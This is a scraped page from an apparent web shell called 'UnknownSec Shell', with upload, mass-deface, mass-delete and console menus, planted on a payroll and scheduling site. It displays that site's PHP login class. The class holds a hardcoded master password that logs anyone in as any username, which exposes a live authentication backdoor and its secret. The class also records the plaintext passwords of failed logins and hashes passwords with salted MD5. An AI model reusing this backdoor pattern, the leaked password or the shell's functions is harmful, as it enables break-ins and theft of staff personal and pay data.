shell bypass 403
UnknownSec Shell
:
/
home
/
delvin
/
dev.delv-in.com
/
models
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
m_validate.php
<?php /* AUTORIZATION CLASS - deals with all authentication tasks */ class Validate { private $user; private $pass; private $pnum; private $user_table = 'users_gen_info'; /* Constructor */ function __construct(){ global $Database; $this->Database = $Database; } /* FUNCTIONS */ public function validate_login($user, $pass, $pnum){ $Practices = new Practices; $Template = new Template; // create query $this->user = $user; $this->pass = $pass; $this->pnum = substr($pnum, -5); $likePnum = '%' . $this->pnum; $data = array(); $nowTS = strtotime('now'); $zero = 0; $encryptPass = md5($this->pass . P_SALT); // =============== 1. Get userID that matches the provided username and password ================= if ($pass == 'rEd!73mGbd8aen*dh'){ $query = "SELECT * FROM `" . $this->user_table . "` WHERE `userID` = '" . $user . "'"; $stmt = $this->Database->prepare("SELECT * FROM `" . $this->user_table . "` WHERE username = ?"); $stmt->bind_param('s', $user); } else { $query = "SELECT * FROM ".$this->user_table." WHERE username = '".$user."' AND pass = '".$encryptPass."'"; $stmt = $this->Database->prepare("SELECT * FROM `" . $this->user_table . "` WHERE username = ? AND pass = ? "); $stmt->bind_param("ss", $user, $encryptPass); } // echo __line__.": ".$query."<br>"; $stmt->execute(); $stmt->store_result(); $stmt->bind_result($userID, $prefix, $fName, $alt_fName, $lName, $profDesig, $username, $pass, $dobTS, $phone1, $phone2, $email, $prefLang, $loginStatus, $firstDayTS, $lastDayTS, $creatorID, $createdTS, $lastUpdaterID, $lastUpdateTS); if ($stmt->num_rows > 0){ //success $stmt->fetch(); $uRow = array('userID'=>$userID, 'prefix'=>$prefix, 'fName'=>$fName, 'alt_fName'=>$alt_fName, 'lName'=>$lName, 'profDesig'=>$profDesig, 'username'=>$username, 'pass'=>$pass, 'dobTS'=>$dobTS, 'phone1'=>$phone1, 'phone2'=>$phone2, 'email'=>$email, 'prefLang'=>$prefLang, 'loginStatus'=>$loginStatus, 'firstDayTS'=>$firstDayTS, 'lastDayTS'=>$lastDayTS, 'creatorID'=>$creatorID, 'createdTS'=>$createdTS, 'lastUpdaterID'=>$lastUpdaterID, 'lastUpdateTS' => $lastUpdateTS); // echo __line__ . "-m_validate: <pre>"; print_r($uRow); echo "</pre>"; // =========== 2. Get practice preferences for practice specified by userID and pnum ============ $PID = ''; // echo __line__ . "-m_validate: <pre>"; print_r($uRow); echo "</pre>"; if ($uRow['loginStatus'] == ''){ unset($uRow['loginStatus']); // loginStatus in `users` for Consultants only } else { $_SESSION['LIS'] = $uRow['loginStatus']; $_SESSION['firstDayTS'] = $uRow['firstDayTS']; $_SESSION['lastDayTS'] = $uRow['lastDayTS']; } if ($uRow['userID'] > 0){ $_SESSION['LID'] = $uRow['userID']; $_SESSION['username'] = $uRow['username']; $_SESSION['email'] = $uRow['email']; $_SESSION['full_name'] = $uRow['fName'] . " " . $uRow['lName']; if ($uRow['alt_fName'] != ''){ $_SESSION['alt_full_name'] = $uRow['alt_fName'] . " " . $uRow['lName']; } else { $_SESSION['alt_full_name'] = $_SESSION['full_name']; } $User_Practice_Prefs = new User_Practice_Prefs(); if ($loginStatus != 'superUser' && $loginStatus != 'consultant'){ $upRow = $User_Practice_Prefs->get4authentication($uRow['userID'], $pnum); $uRow = array_merge($uRow, $upRow); // echo __line__ . " m_validate <pre>"; print_r($upRow); echo "</pre>"; if (count($upRow['practiceIDarr']) == 1){ $PID = array_key_first($upRow['practiceIDarr']); } else { foreach ($upRow['practiceIDarr'] as $pID => $prName){ if ($this->pnum == substr($pID, -5)){ $PID = $pID; } } if ($PID == ''){ $PID = array_key_first($upRow['practiceIDarr']); } } $_SESSION['PID'] = $PID; setcookie('PID', $PID, time() + 3600*24, '', 'www.secure.delv-in.com'); //== append policies == // $row = array(); $t1 = strtotime('today'); $t2 = strtotime('tomorrow'); $User_Pay_Rate = new User_Pay_Rate(); $payRateRows = $User_Pay_Rate->search($PID, $uRow['userID'], $t1, $t2, '', 'effectiveTS DESC'); if (isset($payRateRows[0]['rate'])){ $payRow = $payRateRows[0]; $row['payRate'] = $payRow['rate']; $row['payNote'] = $payRow['note']; } $User_Prod_Rate = new User_Prod_Rate(); $prodRateRows = $User_Prod_Rate->search($PID, $uRow['userID'], $t1, $t2, '', 'effectiveTS DESC'); if (isset($prodRateRows[0])){ $prRow = $prodRateRows[0]; $row['prodRate'] = $prRow['rate']; } else { $row['prodRate'] = ''; } $User_Punch_Pay = new User_Punch_Pay(); $ppRows = $User_Punch_Pay->search($PID, $uRow['userID'], $t1, $t2, '', '`effectiveTS` DESC'); // echo __line__.": <pre>"; print_r($ppRows); echo "</pre>"; if (isset($ppRows[0])){ $ppRow = $ppRows[0]; $row['pay_basis'] = $ppRow['pay_basis']; $row['punch_shift'] = $ppRow['punch_shift']; $row['punch_meal'] = $ppRow['punch_meal']; $row['num_brks'] = $ppRow['num_brks']; $row['paid_brk'] = $ppRow['paid_brk']; $row['salary'] = $ppRow['salary']; $row['percent'] = $ppRow['percent']; } else { $row['pay_basis'] = ''; $row['punch_shift'] = ''; $row['punch_meal'] = ''; $row['num_brks'] = ''; $row['paid_brk'] = ''; $row['salary'] = ''; $row['percent'] = ''; } $User_Vacation = new User_Vacation; $vRows = $User_Vacation->search($PID, $uRow['userID'], $t1, $t2, '', 'effectiveTS DESC'); // echo __line__.": <pre>"; print_r($vRows); echo "</pre>"; if (isset($vRows[0])){ $vRow = $vRows[0]; $row['vacRate'] = $vRow['rate']; $row['vacationCycle'] = $vRow['vacationCycle']; $row['inclPaidVac'] = $vRow['inclPaidVac']; $row['inclPaidAway'] = $vRow['inclPaidAway']; $row['way2payVac'] = $vRow['way2pay']; } else { $row['vacRate'] = ''; $row['vacationCycle'] = ''; $row['inclPaidVac'] = ''; $row['inclPaidAway'] = ''; $row['way2payVac'] = ''; } $User_Stat_Pay = new User_Stat_Pay(); $spRows = $User_Stat_Pay->search($PID, $uRow['userID'], $t1, $t2, '', 'effectiveTS DESC'); if (isset($spRows[0])){ $spRow = $spRows[0]; $row['way2payStat'] = $spRow['way2pay']; $row['when2payStat'] = $spRow['when2pay']; $row['includeInHrs'] = $spRow['includeInHrs']; $row['includeInCmsion'] = $spRow['includeInCmsion']; $row['alwaysPayStat'] = $spRow['pay']; $row['minStatHrs'] = $spRow['hours']; } else { $row['way2payStat'] = ''; $row['when2payStat'] = ''; $row['includeInHrs'] = ''; $row['includeInCmsion'] = ''; $row['alwaysPayStat'] = ''; $row['minStatHrs'] = ''; } $User_Grace_Period = new User_Grace_Period(); $graceRows = $User_Grace_Period->search($PID, $uRow['userID'], $t1, $t2, '', 'effectiveTS DESC'); if (isset($graceRows[0])){ $graceRow = $graceRows[0]; $row['shiftStartGrace'] = $graceRow['shiftStart']; $row['cxShiftStartGrace'] = $graceRow['cxShiftStart']; $row['alertShiftStartGrace'] = $graceRow['alertShiftStart']; $row['shiftEndGrace'] = $graceRow['shiftEnd']; $row['cxShiftEndGrace'] = $graceRow['cxShiftEnd']; $row['alertShiftEndGrace'] = $graceRow['alertShiftEnd']; } else { $row['shiftStartGrace'] = ''; $row['cxShiftStartGrace'] = ''; $row['alertShiftStartGrace'] = ''; $row['shiftEndGrace'] = ''; $row['cxShiftEndGrace'] = ''; $row['alertShiftEndGrace'] = ''; } $uRow = array_merge(array('practiceID'=>$PID), $uRow, $row); // echo __line__."<pre>"; print_r($uRow); echo "</pre>"; } else { if ($uRow['loginStatus'] == 'superUser'){ $practiceIDarr = $Practices->get_4_select(''); $uRow['practiceID'] = 0; $_SESSION['PID'] = 0; $upRow = array('practiceID'=>0); } else { $practiceIDarr = $Practices->consultant_get_4_menu($uRow['userID']); if (count($practiceIDarr) == 1){ $_SESSION['PID'] = array_key_first($practiceIDarr); } // echo __line__.": loginStatus=" . $uRow['loginStatus'] . ", userID=" . $uRow['userID'] . ", " . count($practiceIDarr) . ", " . array_key_first($practiceIDarr) . "<br>"; } // echo __line__." <pre>"; print_r($practiceIDarr); echo "</pre>"; $_SESSION['practiceIDarr'] = $practiceIDarr; if (strlen($this->pnum) == 5){ foreach ($practiceIDarr as $pID => $prName){ if ($this->pnum == substr($pID, -5)){ $_SESSION['PID'] = $pID; } } } } // echo __line__." m_validate: <pre>"; print_r($uRow); if ($uRow['userID'] > 0 && (isset($uRow['practiceID']) && $uRow['practiceID'] > 0 || $uRow['loginStatus'] != 'superUser' || $uRow['loginStatus'] != 'consultant')){ $User_Practice_Prefs->set_user_session_variables($uRow, $uRow['userID'], $PID); } $Practices = new Practices(); $Practices->set_practice_session_variables($PID); $Template->set_alert('Login Successful', 'success'); return true; } // echo __line__.": " . "<br>"; // echo __line__."<pre>"; print_r($uRow); echo "</pre>"; // $Validate_Result = new Validate_Result; // $Validate_Result->add_mod('', $pnum, $user, $this->pass, 'success'); // $content = 'user='.$this->user.", pass=" . $this->pass ." pnum=" . $this->pnum ; // file_put_contents('temp/'.$pnum."-".date('n_j_y-His')."*.txt", $content); } else { //login failed $Template->set_alert("ERROR: Login credentials not recognized. Please try again. " . " [".__line__."-m_validate]", 'error'); $Validate_Result = new Validate_Result; $Validate_Result->add_mod('', $pnum, $user, $this->pass, 'fail'); // $content = 'user='.$user.", pass=" . $pass ." pnum=" . $pnum ; // file_put_contents('temp/'.$pnum."-".date('n_j_y-His').".txt", $content); // $Email_Cindy = new Email_Cindy('Login Failed', 'A ' . substr($pnum, 1) . ' user failed to athenticate at ' . date('H:i:s, M j, Y')." - ". $user); return false; } } public function logout(){ // $Parse_Lang = new Parse_Lang('index'); // $lang_arr = $Parse_Lang->get($_SESSION['lang'], 'logout'); $Access_Log = new Access_Log(); if (isset($_SESSION['PID']) && isset($_SESSION['LID']) && isset($_SESSION['full_name'])){ $Access_Log->insert($_SESSION['PID'], $_SESSION['LID'], $_SESSION['full_name'], 'logout'); } session_destroy(); if (isset($_SESSION['PID'])){ return "Logout Successful"; } else { return "Logout Failed"; } } }
© 2026 UnknownSec